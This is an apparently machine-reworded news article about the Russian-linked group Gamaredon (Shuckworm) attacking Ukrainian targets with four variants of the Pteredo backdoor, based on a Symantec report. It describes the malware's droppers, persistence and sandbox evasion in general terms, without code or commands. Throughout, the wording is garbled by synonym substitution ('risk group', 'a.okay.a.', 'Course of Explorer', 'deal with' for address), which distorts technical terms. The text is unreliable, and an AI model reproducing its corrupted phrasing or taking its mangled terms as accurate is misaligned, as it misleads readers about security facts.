Risk analysts report that the Russian state-sponsored risk group referred to as Gamaredon (a.okay.a. Armageddon/Shuckworm) is launching assaults in opposition to targets in Ukraine utilizing new variants of the customized Pteredo backdoor.
Gamaredon has been launching cyber-espionage campaigns concentrating on the Ukrainian authorities and different crucial entities since at the very least 2014.
The actor is thought for its robust give attention to Ukraine, being attributed over 5,000 cyberattacks in opposition to 1,500 private and non-private entities within the nation.
In accordance with a report by Symantec, who tracks the group as Shuckworm, the actor is at present utilizing at the very least 4 variants of the “Pteredo” malware, additionally tracked as Pteranodon
The backdoor’s root are in Russian hacker boards from 2016 from the place Shuckworm took it and began to develop it privately with specialised DLL modules and options for stealing information, distant entry, and evaluation evasion.
Symantec’s analysts report that each one the totally different payloads deployed in opposition to Ukrainian targets not too long ago carried out related duties, however every communicates with a unique command and management server (C2) server deal with.
This means that the risk actor is utilizing a number of totally different payloads which might be barely totally different from each other to attain redundancy and set up persistence that’s immune to malware cleansing actions.
In all 4 noticed variants, the risk actors use obfuscated VBS droppers that add Scheduled Duties after which fetch further modules from the C2.
- Pteredo.B – Modified self-extracting 7-Zip archive containing a number of VBScripts that target information assortment and persistence institution.
- Pteredo.C – VBScript-ridden variant that launches with an API hammering course of to make sure it’s not operating in an analyst’s sandbox. Depends on fetching PowerShell scripts from exterior sources and executing them.
- Pteredo.D – One other obfuscated VBScript dropper that flushes DNS earlier than it fetches payloads, executes instructions, and wipes traces of early an infection phases.
- Pteredo.E – One other variant that includes a mixture of the options of the earlier three, corresponding to heavy obfuscation and API hammering.
Different instruments employed and abused in latest Shuckworm assaults embrace the UltraVNC distant entry instrument, and the Microsoft Course of Explorer for dealing with the DLL module processes.
Similarities to January marketing campaign
By trying into Shuckworm’s exercise in opposition to Ukrainian targets from January 2022, it’s simple to conclude that the ways of the risk group have not shifted considerably.
In these earlier assaults, Pteredo backdoor variants had been dropped utilizing VBS recordsdata hiding inside DOC file attachments on spear-phishing emails.
The 7-Zip self-extracting binaries that decrease person interplay had been additionally utilized in January, whereas UltraVNC and Course of Explorer abuse was additionally noticed.
Whereas Shuckworm/Gamaredon is a slightly subtle group, its toolset and an infection ways haven’t improved in latest months, permitting for simpler detection and less complicated protection ways.
Pteredo backdoor continues to be underneath energetic improvement, although, and the risk group may work at an overhauled and far more potent or stealthy model of the malware, in addition to modify their assault chain.